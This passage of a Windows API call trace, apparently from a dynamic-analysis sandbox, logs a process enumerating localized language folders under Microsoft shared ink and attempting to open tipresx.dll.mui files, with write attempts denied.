Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.729] GetLastError () returned 0x5 [0100.729] GetLastError () returned 0x5 [0100.729] SetLastError (dwErrCode=0x5) [0100.729] GetLastError () returned 0x5 [0100.729] SetLastError (dwErrCode=0x5) [0100.729] GetLastError () returned 0x5 [0100.729] SetLastError (dwErrCode=0x5) [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0100.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.729] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c850, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.729] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0100.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0100.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0100.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.730] AreFileApisANSI () returned 1 [0100.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS", lpUsedDefaultChar=0x0) returned 62 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0100.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.730] AreFileApisANSI () returned 1 [0100.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ec68 [0100.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS") returned 62 [0100.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.731] GetLastError () returned 0x5 [0100.731] GetLastError () returned 0x5 [0100.731] SetLastError (dwErrCode=0x5) [0100.731] GetLastError () returned 0x5 [0100.731] SetLastError (dwErrCode=0x5) [0100.731] GetLastError () returned 0x5 [0100.731] SetLastError (dwErrCode=0x5) [0100.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0100.731] AreFileApisANSI () returned 1 [0100.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0100.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS") returned 62 [0100.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.731] GetLastError () returned 0x5 [0100.731] GetLastError () returned 0x5 [0100.731] SetLastError (dwErrCode=0x5) [0100.731] GetLastError () returned 0x5 [0100.731] SetLastError (dwErrCode=0x5) [0100.731] GetLastError () returned 0x5 [0100.731] SetLastError (dwErrCode=0x5) [0100.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0100.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0100.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.732] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0100.732] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0100.732] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.732] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0100.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.733] AreFileApisANSI () returned 1 [0100.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 78 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0100.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.734] AreFileApisANSI () returned 1 [0100.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0100.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8ced8 [0100.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8ced8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui") returned 78 [0100.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.734] GetFileType (hFile=0x27c) returned 0x1 [0100.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0100.734] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.734] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.734] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.735] CloseHandle (hObject=0x27c) returned 1 [0100.838] AreFileApisANSI () returned 1 [0100.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0100.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c650 [0100.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8c650, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui") returned 78 [0100.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.838] GetLastError () returned 0x5 [0100.838] GetLastError () returned 0x5 [0100.838] SetLastError (dwErrCode=0x5) [0100.838] GetLastError () returned 0x5 [0100.838] SetLastError (dwErrCode=0x5) [0100.838] GetLastError () returned 0x5 [0100.838] SetLastError (dwErrCode=0x5) [0100.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0100.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0100.838] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.838] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.838] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x9a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5fb10, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x9a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧☀")) returned 0 [0100.838] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0100.839] AreFileApisANSI () returned 1 [0100.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE", cchWideChar=-1, lpMultiByteStr=0x327f67c, 